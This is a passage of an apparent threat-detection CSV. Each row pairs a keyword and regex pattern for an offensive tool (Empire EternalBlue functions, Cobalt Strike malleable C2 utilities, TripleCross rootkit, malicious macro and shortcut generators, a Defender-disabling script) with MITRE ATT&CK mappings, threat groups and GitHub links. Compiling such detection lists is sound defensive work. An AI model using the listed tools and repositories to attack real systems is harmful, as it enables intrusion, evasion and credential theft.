TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_nt_trans_packet*",".{0,1000}make_smb1_nt_trans_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_trans2_explo*",".{0,1000}make_smb1_trans2_explo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb2_payload_body_packet*",".{0,1000}make_smb2_payload_body_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb2_payload_headers_packet*",".{0,1000}make_smb2_payload_headers_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*makebof.bat*",".{0,1000}makebof\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*MakeHTTPSmugglerJAR.launch*",".{0,1000}MakeHTTPSmugglerJAR\.launch.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","683","110","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" "*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Maldev-Academy/HellHall*",".{0,1000}Maldev\-Academy\/HellHall.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*Malicious program execve hijacker executed*",".{0,1000}Malicious\sprogram\sexecve\shijacker\sexecuted.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Malicious Shortcut Generator*",".{0,1000}Malicious\sShortcut\sGenerator.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*Malicious Shortcut(.lnk) Generator*",".{0,1000}Malicious\sShortcut\(\.lnk\)\sGenerator.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*malicious.csproj*",".{0,1000}malicious\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*malicious.dll*",".{0,1000}malicious\.dll.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*MaliciousInjectedDll.dll*",".{0,1000}MaliciousInjectedDll\.dll.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*MaliciousMacroGenerator*",".{0,1000}MaliciousMacroGenerator.{0,1000}","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","9","816","203","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z" "*MaliciousMacroMSBuild-master*",".{0,1000}MaliciousMacroMSBuild\-master.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*Malleable C2 Files*",".{0,1000}Malleable\sC2\sFiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*Malleable PE/Stage*",".{0,1000}Malleable\sPE\/Stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*malleable_redirector.py*",".{0,1000}malleable_redirector\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*malleable_redirector_hidden_api_endpoint*",".{0,1000}malleable_redirector_hidden_api_endpoint.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Malleable-C2-Profiles*",".{0,1000}Malleable\-C2\-Profiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*malleable-c2-randomizer.py*",".{0,1000}malleable\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*MalleableProfileB64*",".{0,1000}MalleableProfileB64.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*MalleableProfiles.vue*",".{0,1000}MalleableProfiles\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*malleable-redirector-config*",".{0,1000}malleable\-redirector\-config.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*MalSCCM.exe*",".{0,1000}MalSCCM\.exe.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*MalSCCM-main*",".{0,1000}MalSCCM\-main.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*malware.NewConfig*",".{0,1000}malware\.NewConfig.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*malwaredllc*",".{0,1000}malwaredllc.{0,1000}","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8758","2094","2024-04-08T19:52:57Z","2017-12-18T09:10:12Z" "*malwareurl = ""https:*",".{0,1000}malwareurl\s\=\s\""https\:.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*man_in_the_browser.json*",".{0,1000}man_in_the_browser\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" 